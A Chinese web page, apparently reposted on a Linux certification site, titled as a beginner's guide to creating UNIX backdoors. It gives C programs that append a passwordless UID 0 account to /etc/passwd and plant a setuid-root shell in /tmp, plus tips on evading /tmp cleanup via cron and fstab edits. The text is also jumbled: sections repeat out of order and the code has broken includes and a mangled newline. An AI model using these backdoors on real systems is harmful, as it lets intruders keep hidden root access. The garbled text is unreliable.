求学资讯 Linux认证 提问
Linux认证 > 备考经验

教你如何创建UNIX后门(初级篇)

来源:用户上传 上传用户:zhongzhanen 发布时间:2017-11-10

导读:
小编为您搜集整理了"教你如何创建UNIX后门(初级篇)“,供您参考,希望对大家有所帮助!

  比这种方法稍微隐蔽一点的就是将藏在口令文件中某个无人使用帐号的 UID 改为 0,并将其第二个域(口令域)设为空。(注意,如果你使用的是较高版本的*nix,也许还要修改 /etc/shadow 文件。)

  在 /tmp 目录下放置 suid shell.以后只要你运行这个程序,就会轻易得到根用户权限。这种方法几乎是最受欢迎的了。但有许多系统每几小时,或者每次启动都会清除 /tmp 目录下的数据,另外一些系统则根本不允许运行 /tmp 目录下的 suid 程序。当然,你可以自己修改或清除这些限制(因为你已是根用户,有权限修改 /var/spool/cron/crontabs/root 和 /etc/fstab 文件)。以下是在 /tmp 目录下放置 suid shell 程序的C源程序。

  <++> backdoor/backdoor2.c

  #include

  main()

  {

  system("cp /bin/sh /tmp/fid");

  system("chown root.root /tmp/fid");

  system("chmod 4755 /tmp/fid");

  }

-->

  最简单的方法,就是在口令文件 passwd 中增加一个 UID 为 0 的帐号。但最好别这么做,因为只要系统管理员检查口令文件就会"漏馅"了。以下是在 /etc/passwd 口令文件中添加一个 UID 0 帐号的C程序。

  <++> backdoor/backdoor1.c

  #include

  main()

  {

  FILE *fd;

  fd=fopen("/etc/passwd","a+");

  fprintf(fd,"hax0r::0:0::/root:/bin/shn");

  }

  <-->

  比这种方法稍微隐蔽一点的就是将藏在口令文件中某个无人使用帐号的 UID 改为 0,并将其第二个域(口令域)设为空。(注意,如果你使用的是较高版本的*nix,也许还要修改 /etc/shadow 文件。)

  在 /tmp 目录下放置 suid shell.以后只要你运行这个程序,就会轻易得到根用户权限。这种方法几乎是最受欢迎的了。但有许多系统每几小时,或者每次启动都会清除 /tmp 目录下的数据,另外一些系统则根本不允许运行 /tmp 目录下的 suid 程序。当然,你可以自己修改或清除这些限制(因为你已是根用户,有权限修改 /var/spool/cron/crontabs/root 和 /etc/fstab 文件)。以下是在 /tmp 目录下放置 suid shell 程序的C源程序。

  <++> backdoor/backdoor2.c

  #include

  main()

  {

  system("cp /bin/sh /tmp/fid");

  system("chown root.root /tmp/fid");

  system("chmod 4755 /tmp/fid");

  }

声明:本站为免费网络服务提供商,网站所有信息均为用户自行发布并由用户承担相应法律责任,本站不对其真实性及合法性负责,如涉及侵权或者信息违法,请你及时与本站联系删除。

阅读 651 举报

相关推荐
评论0

当前没有评论内容

发表评论 0条评论
14
微博
QQ
QQ空间
微信
取消